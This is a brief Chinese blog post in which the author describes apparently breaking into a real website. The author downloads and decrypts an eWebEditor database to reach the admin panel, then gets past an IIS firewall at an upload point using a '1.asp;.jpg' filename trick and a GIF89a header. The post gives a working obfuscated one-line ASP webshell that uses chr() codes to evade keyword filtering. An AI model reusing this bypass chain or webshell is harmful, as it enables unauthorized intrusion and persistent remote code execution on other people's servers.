实记绕过IIS防火墙思路

今年头一次拿站还是很顺利的，在上传的地方遇到了一些阻碍其他都比较顺利，先前的一些步骤都省略了，下面具体记录上传时遇到IIS防火墙绕过的一些思路。
首先找到了ewebeditor：

http://www.xxxxx.com/Web_Admin/htmledit/

下载mdb，然后解密顺利进入后台，不出所料的可以遍历无法修改样式，这里补充一下，"s_full"样式的目录不存在，所以无法远程下载，遍历翻到了上传点：

http://www.xxxxx.com/Web_Admin/include/uppic.asp

先找正常图片上传观察一下：

可惜的是被拦截了：

顺手测试了一下"1.aspx"不会被拦截，但是不支持aspx，后来结合分号成功绕过（“1.asp;.jpg”），直接上传一句话会提示"文件格式不正确"，所以加上"GIF89ax"头，之后又被IIS防火墙拦截提示：

当前发送的内容中可能包含“一句话木马”而被IIS防火墙禁止！

找个变形的一句话成功搞定：

<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))(“bs”))%>

文章没有太多叙述，但是真实测试中肯定不会这么快反应过来，所以还是得积累经验。

转载请注明: 本文《实记绕过IIS防火墙思路》来源于bstaint的博客